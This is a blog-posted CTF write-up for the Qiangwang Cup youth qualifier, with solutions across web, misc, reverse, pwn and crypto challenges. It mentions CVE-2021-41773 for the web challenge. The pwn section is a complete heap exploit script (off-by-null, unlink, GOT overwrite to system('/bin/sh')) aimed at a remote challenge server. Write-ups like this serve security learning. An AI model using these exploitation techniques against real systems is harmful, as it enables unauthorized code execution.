强网杯青少年杯初赛wp

战队信息

战队名称：Rml
战队排名：5

解题情况

解题过程

web

web1

CVE-2021-41773，payload直接打

misc

misc1

base64解密后得到一张图片，但是每两个字节被换了位置

修复脚本

f=open('a.png','rb')
f1=open('b.png','wb')

data=f.read()
for i in range(0,len(data),2):
    f1.write(data[i:i+2][::-1])

得到hint密钥就是音乐的财富密码，加上题目描述你知道万能和弦是什么吗?，得到4536251

lsb解密得到flag

misc2

赛后复现

祥云杯shuffle_code的后半部分

按行打乱了
网上的爆破脚本

data = [[1,1,1,1,1,1,1,0,1,0,1,1,0,0,1,1,0,1,0,0,1,0,1,1,1,1,1,1,1],[1,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,0,0,1],[1,0,1,1,1,0,1,0,1,0,1,1,1,1,1,0,0,0,0,1,1,0,1,0,1,1,1,0,1],[1,0,1,1,1,0,1,0,0,1,0,0,1,1,1,0,0,1,1,0,1,0,1,0,1,1,1,0,1],[1,0,1,1,1,0,1,0,1,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,1],[1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,1],[1,1,1,1,1,1,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,1,1,1,1,1,1],[0,0,0,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[1,0,0,1,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1],[1,1,1,1,0,0,0,0,1,1,0,0,0,0,0,1,1,0,0,0,1,0,1,1,1,1,0,0,1],[1,1,0,0,1,0,1,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,1,0,1],[0,1,1,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,1,1,0,1,1,1,0,1],[1,1,0,0,1,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,0,1],[1,1,1,0,1,0,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,1,1,1,0,0,0],[0,0,0,0,1,0,1,1,0,0,1,0,1,0,1,1,0,1,1,0,1,1,1,0,1,1,0,0,0],[1,1,1,1,1,1,0,1,0,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,1,1,1,0,1],[0,1,1,1,0,1,1,1,1,0,0,1,0,1,0,0,0,0,1,1,1,0,0,0,0,0,0,0,1],[1,0,0,1,1,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,1,1,0,0,1,1,1,0,0],[1,0,1,1,1,1,1,1,0,0,1,0,1,0,1,1,1,0,1,1,0,1,1,1,0,0,0,1,1],[1,0,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,1,1,0,1,1,1,1,1,1,0,1,1],[1,1,1,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1],[0,0,0,0,0,0,0,0,1,0,1,1,0,1,0,1,0,0,0,1,1,0,0,0,1,0,1,0,0],[1,1,1,1,1,1,1,0,1,0,0,1,0,1,0,1,0,1,1,1,1,0,1,0,1,1,0,0,0],[1,0,0,0,0,0,1,0,1,1,1,0,1,0,1,0,1,1,1,0,1,0,0,0,1,0,0,0,0],[1,0,1,1,1,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,0,0,1,0],[1,0,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,1,1,0,1,0,0,1,0,1,1,0,1],[1,0,1,1,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,1,1],[1,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,1,0,1,1,0,1,0,1,0,1],[1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,1,0,0,0,0,1,0,1,1,0,1,0,0,0]]

import pyzbar.pyzbar as pyzbar
from itertools import permutations
from PIL import Image, ImageDraw as draw
import matplotlib.pyplot as plt
from tqdm import tqdm

shuffle_1 = [9, 11, 13, 15, 17, 19]
shuffle_2 = [10, 12, 14, 16, 18]
head = data[0:9]
tail = data[20:]

def body(body_1, body_2):
    body = []
    for i in range(5):
        body.append(body_1[i])
        body.append(body_2[i])
    body.append(body_1[5])
    return [data[i] for i in body]

def draw_img(data):
    assert len(data) == 29 and len(data[0]) == 29
    img = Image.new('RGB', (31, 31), (255,255,255))
    for i, row in enumerate(data):
        for j, pixel in enumerate(row):
            img.putpixel((j + 1, i + 1), (0,0,0) if pixel == 1 else (255,255,255))
    return img

with tqdm(total=720 * 120) as pbar:
    for body_1 in permutations(shuffle_1):
        for body_2 in permutations(shuffle_2):
            im = draw_img(head + body(body_1, body_2) + tail)
            barcodes = pyzbar.decode(im)
            pbar.update(1)
            if(len(barcodes) == 0):
                continue
            for barcode in barcodes:
                barcodeData = barcode.data.decode("utf-8")
                print(barcodeData)
                plt.imshow(im)
                plt.show()

misc3

binwalk分理出一个压缩包

还是lsb解密，密码在图片结尾，7his_1s_p4s5w0rd

reverse

re2

通过gdb动态调试获取地图的全貌

0层
0 1 1 1 1 1 1 1
0 0 0 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1

1层
1 1 1 1 1 1 1 1
1 1 0 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1

2层
1 1 1 1 1 1 1 1
1 1 0 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 1

3层
1 1 1 1 1 1 1 1
1 1 0 0 1 1 1 1
1 1 1 0 1 1 1 1
1 1 1 0 1 1 1 1
1 1 1 0 1 0 1 1
1 1 1 0 1 1 1 1
1 1 1 0 0 0 1 1
1 1 1 1 1 1 1 1

4层
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1

5层
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1

6层
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 0 0
1 1 1 1 1 1 1 0

7层
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 0 1 1
1 1 1 1 1 1 1 0

511=64*7+63所以程序要求从第0层的开头走到第7层的结尾

分别通过a-下，b-上，l-左，r-右，u-下一层，d-上一层进行移动

input: arruuuraaaaarrdbbuuuuuaadrrau

flag：flag{6c2a5b75-232d-26ea-c3cc-8f7a924d7357}

pwn

pwn2

利用创建chunk时的off by null漏洞，通过chunk3设置chunk4的inuse位为0，这样在释放chunk4时就会触发unlink

利用unlink，在chunk_list中写入chunk_list的地址，这样可以达到任意地址读写,需要在合并之前将chunk3的fd->bk与bk->fd指向chunk3,chunk3->fd与chunk3->bk，就为chunk_list上的地址

然后因为程序中strlen和free都是以chunk为第一个参数，所以可以通过修改got表内free的内容为plt表中的puts，来获取chunk3的fd字段，计算得到libc地址，通过修改got表中的strlen内容为system地址执行system("/bin/sh")

from pwn import *
from LibcSearcher import *
#context.log_level='debug'
def add(ind,size,data):
    p.sendlineafter('>','1')
    p.sendlineafter('(0~9):',str(ind))
    p.sendlineafter('(1 ~ 1024):',str(size))
    p.sendafter('Content:',data)

def show(ind):
    p.sendlineafter('>','2')
    p.sendlineafter('(0~9):',str(ind))

def free(ind):
    p.sendlineafter('>','3')
    p.sendlineafter('(0~9):',str(ind))

def edit(ind,data):
    p.sendlineafter('>','4')
    p.sendlineafter('(0~9):',str(ind))
    p.sendafter('Content:',data)

p=remote('101.200.76.17','24195')
#p=process('./b64heap')
#gdb.attach(p)
e=ELF('./b64heap',checksec=0)
libc=ELF('./libc-2.23.so',checksec=0)
free_got=e.got['free']
strlen_got=e.got['strlen']
puts_plt=e.plt['puts']
chunk_list=0x6020c0
heap_list=chunk_list

add(0,0x10,"/bin/sh\x00")
add(1,0x10," ")
add(2,0x10," ")
add(3,0x90," ")
add(4,0xf0," ")
add(5,0x30," ")
add(6,0x30,'/bin/sh\x00')
free(3)
fd=heap_list+0x8*3-0x18
bk=heap_list+0x8*3-0x10
add(3,0x98,p64(0)+p64(0x91)+p64(fd)+p64(bk)+b'a'*0x70+p64(0x90))
free(4)
#free(3)
edit(3,b'a'*8)
show(3)
edit(3,p64(heap_list+0x8*5))
edit(0,p64(heap_list+0x8))
edit(3,p64(free_got))
edit(5,p8(0x80))
edit(0,p64(puts_plt))
free(1)
d=u64(p.read(6).ljust(8,b'\x00'))
print(hex(d))
malloc_hook=d-0x58-0x10

system=malloc_hook-libc.sym['__malloc_hook']+libc.sym['system']
print(hex(strlen_got))
print(hex(system))
edit(3,p64(strlen_got))
edit(0,p64(system))

edit(6,'cat flag\n')

p.interactive()

crypto

crypto1

只有A，B和空格，明显是摩斯
将A替换成-，B替换成.，空格替换/

解密脚本

class morse:
    def __init__(self):
        self.codedict={'.-':"a",
                    '-...':"b",
                    '-.-.':"c",
                    '-..':"d",
                    '.':"e",
                    '..-.':"f",
                    '--.':"g",
                    '....':"h",
                    '..':"i",
                    '.---':"j",
                    '-.-':"k",
                    '.-..':"l",
                    '--':"m",
                    '-.':"n",
                    '---':"o",
                    '.--.':"p",
                    '--.-':"q",
                    '.-.':"r",
                    '...':"s",
                    '-':"t",
                    '..-':"u",
                    '...-':"v",
                    '.--':"w",
                    '-..-':"x",
                    '-.--':"y",
                    '--..':"z",
                    '.----':"1",
                    '..---':"2",
                    '...--':"3",
                    '....-':"4",
                    '.....':"5",
                    '-....':"6",
                    '--...':"7",
                    '---..':"8",
                    '----.':"9",
                    '-----':"0",
                    '..--..':"?",
                    '-..-.':"/",
                    '-.--.':"(",
                    '-.--.-':")",
                    '-....-':"-",
                    '.-.-.-':".",
                    '--..--':',',
                    '-.-.-.':';',
                    '.----.':'\''}

    def GetPlain(self,text):
        textlist=text.split('/')
        detext=''
        for i in textlist:
            detext+=self.codedict[i]
        return detext;

    def DeBlast(self,text,detext):
        for i in self.codedict.keys():
            if text.find(i)==0:
                if (len(text)-len(i))==0:
                    self.delist.append(detext+self.codedict[i])
                    continue
                self.DeBlast(text[len(i):],detext+self.codedict[i])

    def decode(self,text,seg='/',point='.',hor='-',blast=0,out=1):
        """
            key[0]=='.'
            key[1]=='-'
            key[2]=='/'
        """
        key=[point,hor,seg]
        div=['.','-','/']
        if blast==0:
            self.detext=self.GetPlain(text)
            if out:
                print(self.detext)
            return self.detext
        else:
            for i in range(2):
                text=text.replace(key[i],div[i])
            self.delist=[]
            self.DeBlast(text,'')
            if out:
                for i in self.delist:
                        print(i)
            return self.delist
m=morse()
f=open('classicCrypto.txt')
d=f.read().splitlines()
e=''
for i in d:
    e=e+m.decode(i)+' '
print(e)

在https://quipqiup.com/爆破

cryptography is the practice and study of techniques for secure communication in the presence of adversarial behavior, which is divided into classical cryptography and modern cryptography. the main classical cipher types are transposition ciphers, which rearrange the order of letters in a message. an early substitution cipher was the caesar cipher, in which each letter in the plaintext was replaced by a letter some fixed number of positions further down the alphabet. since the development of rotor cipher machines in world war i and the advent of computers in world war ii, cryptography methods have become increasingly complex and its applications more varied. modern cryptography is heavily based on mathematical theory and computer science practice; cryptographic algorithms are designed around computational hardness assumptions. the growth of cryptographic technology has raised a number of legal issues in the information age. cryptography's potential for use as a tool for espionage and sedition has led many governments to classify it as a weapon and to limit or even prohibit its use and export. in some jurisdictions where the use of cryptography is legal, laws permit investigators to compel the disclosure of encryption keys for documents relevant to an investigation. cryptography also plays a major role in digital rights management and copyright infringement disputes in regard to digital media.the flag is 1d817f23-4e20-9405-bf6d-e83d055316d6, please add flag string and braces yourself, and all letters are lowercase.

得到flag：1d817f23-4e20-9405-bf6d-e83d055316d6

crypto2

将题目给出的字符串进行栅栏后发现与flag形式接近

根据flag的格式发现整个字符串需要异或32，根据题目描述的uuid格式，发现flag中小写的l为-，所以原先小写的字符在异或32的基础上还要减去31

解题脚本

a="FvLFArGp[ovpxBpsssD]qCElwwoClsoColwpuvlqFv"
b="FLAG[vxpsDqCElwwoClsoColwpuvlqFvvFrpopBss]"
e=''
for i in b:
    if i.islower():
        e=e+chr((ord(i)^32)-31)
    else:
        e=e+chr(ord(i)^32)
print(e)

#wp #2022 #强网杯

强网杯青少年杯初赛wp

https://www.dr0n.top/posts/2ef8c529/

作者

dr0n

发布于

2022年9月10日

更新于

2024年3月22日

许可协议

第五届浙江省大学生网络与信息安全竞赛初赛-WP 上一篇

opcache缓存利用下一篇